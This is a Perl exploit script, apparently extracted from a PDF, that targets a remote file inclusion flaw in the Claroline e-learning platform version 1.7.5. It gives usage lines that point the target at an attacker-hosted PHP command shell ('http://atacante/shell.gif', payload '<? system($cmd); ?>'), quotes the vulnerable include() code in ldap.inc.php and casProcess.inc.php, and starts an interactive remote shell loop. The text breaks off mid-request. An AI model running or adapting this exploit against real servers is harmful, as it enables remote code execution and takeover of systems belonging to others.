1 #!/usr/bin/perl
2 ############
3 # Claroline Open Source e−Learning 1.7.5 Remote File Include
4 # Exploit & Advisorie: beford <xbefordx gmail com>
5 #
6 # uso:#
perl own.pl <host> <cmd−shell−url> <cmd−var>
7 #
perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
8 #
9 # cmd shell example: <? system($cmd); ?>
10 # cmd variable: cmd;
11 #
12 #############
13 # Description
14 #############
15 # Vendor: http://www.claroline.net
16 # The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
17 # clarolineRepositorySys in a include() function without being declared.
18 # There are other files vulnerable in the same folder, this exploit only
19 # attacks ldap.inc.php
20 #
21 # There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
22 # it uses the claro_CasLibPath in a include function but this is not being
23 # declared either, so pwnt, RFI. Vendor was contacted through email,
24 # no response, so i just posted this here and on its forum.
25 ############
26 # Vulnerable code (lda.inc.php)
27 ############
28 # return require $clarolineRepositorySys.’/auth/extauth/extAuthProcess.inc.php’;
29 ############
30 # Vulnerable code (casProcess.inc.php)
31 ############
32 #if ( ! isset($_SESSION[’init_CasCheckinDone’] )
33 # || $logout
34 # || ( basename($_SERVER[’SCRIPT_NAME’]) == ’login.php’ && isset($_REQUEST[’authModeReq’]) && $_REQUEST[’authModeR
eq’] == ’CAS’ )
35 # || isset($_REQUEST[’fromCasServer’]) )
36 #{
37 # include_once $claro_CasLibPath;
38 ############
39 use LWP::UserAgent;
40
41 $Path = $ARGV[0];
42 $Pathtocmd = $ARGV[1];
43 $cmdv = $ARGV[2];
44 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
45 head();
46 while() {
47
print "[shell] \$";
48
while(<STDIN>) {
49
$cmd=$_;
50
chomp($cmd);
51
if (!$cmd) {last;}
Page 1/2
Claroline eLearning 1.75 ldap.inc.php Remote File Inclusion Exploit
beford
05/08/2006
52
$xpl = LWP::UserAgent−>new() or die;
53
$req = HTTP::Request−>new(GET =>$Path.’extauth/drivers/ldap.inc.